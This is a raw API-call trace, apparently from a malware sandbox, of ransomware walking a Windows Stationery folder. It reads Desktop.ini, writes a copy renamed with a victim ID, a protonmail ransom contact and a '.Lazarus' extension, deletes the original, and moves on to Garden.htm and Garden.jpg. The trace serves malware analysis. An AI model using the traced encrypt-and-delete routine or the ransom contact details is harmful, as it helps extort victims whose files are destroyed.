[0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.122] AreFileApisANSI () returned 1 [0102.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0102.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a8c0 [0102.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 70 [0102.122] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a3ecc0a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5d2da05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5d2da05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x285)) returned 1 [0102.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0102.122] AreFileApisANSI () returned 1 [0102.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0102.123] GetLastError () returned 0x0 [0102.123] SetLastError (dwErrCode=0x0) [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e420 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x570e0 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0102.123] GetLastError () returned 0x0 [0102.123] SetLastError (dwErrCode=0x0) [0102.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a4b0 [0102.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0102.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.123] AreFileApisANSI () returned 1 [0102.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 132 [0102.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x108) returned 0x8be28 [0102.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x8be28, cchWideChar=132 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 132 [0102.124] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.124] GetFileType (hFile=0x368) returned 0x1 [0102.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8be28 | out: hHeap=0x20000) returned 1 [0102.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0102.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.124] AreFileApisANSI () returned 1 [0102.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0102.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a790 [0102.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 70 [0102.124] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.125] GetFileType (hFile=0x27c) returned 0x1 [0102.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0102.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0102.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0102.125] GetLastError () returned 0x0 [0102.125] SetLastError (dwErrCode=0x0) [0102.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0102.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0102.125] GetLastError () returned 0x0 [0102.125] SetLastError (dwErrCode=0x0) [0102.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0102.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x986d0 [0102.125] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f030*=0x285, lpOverlapped=0x0) returned 1 [0102.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0102.251] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0102.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0102.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x996d8 [0102.251] GetLastError () returned 0x0 [0102.251] SetLastError (dwErrCode=0x0) [0102.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5) returned 0x7d050 [0102.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0102.251] GetLastError () returned 0x0 [0102.251] SetLastError (dwErrCode=0x0) [0102.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0102.252] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327ef70*=0x290, lpOverlapped=0x0) returned 1 [0102.253] GetLastError () returned 0x0 [0102.253] SetLastError (dwErrCode=0x0) [0102.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.253] GetLastError () returned 0x0 [0102.253] SetLastError (dwErrCode=0x0) [0102.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0102.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0102.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0102.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x996d8 | out: hHeap=0x20000) returned 1 [0102.253] CloseHandle (hObject=0x368) returned 1 [0102.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0102.254] CloseHandle (hObject=0x27c) returned 1 [0102.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0102.254] AreFileApisANSI () returned 1 [0102.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0102.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a8c0 [0102.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 70 [0102.254] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.254] GetLastError () returned 0x5 [0102.254] GetLastError () returned 0x5 [0102.254] SetLastError (dwErrCode=0x5) [0102.255] GetLastError () returned 0x5 [0102.255] SetLastError (dwErrCode=0x5) [0102.255] GetLastError () returned 0x5 [0102.255] SetLastError (dwErrCode=0x5) [0102.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0102.255] GetLastError () returned 0x5 [0102.255] SetLastError (dwErrCode=0x5) [0102.255] AreFileApisANSI () returned 1 [0102.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0102.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a6f8 [0102.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a6f8, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 70 [0102.255] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x570e0 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0102.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.257] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.257] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe7, dwReserved0=0x1, dwReserved1=0x0, cFileName="Garden.htm", cAlternateFileName="")) returned 1 [0102.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0102.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0102.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0102.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.257] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.257] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.257] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.257] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.257] AreFileApisANSI () returned 1 [0102.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm", lpUsedDefaultChar=0x0) returned 69 [0102.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0102.257] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.257] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0102.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0102.258] AreFileApisANSI () returned 1 [0102.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0102.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 69 [0102.258] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.258] GetFileType (hFile=0x27c) returned 0x1 [0102.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.258] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.258] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.259] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.259] CloseHandle (hObject=0x27c) returned 1 [0102.259] AreFileApisANSI () returned 1 [0102.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0102.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 69 [0102.259] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.259] GetLastError () returned 0x5 [0102.259] GetLastError () returned 0x5 [0102.259] SetLastError (dwErrCode=0x5) [0102.259] GetLastError () returned 0x5 [0102.259] SetLastError (dwErrCode=0x5) [0102.259] GetLastError () returned 0x5 [0102.259] SetLastError (dwErrCode=0x5) [0102.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0102.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.260] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5d3f, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Garden.jpg", cAlternateFileName="")) returned 1 [0102.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0102.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0102.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0102.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0102.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 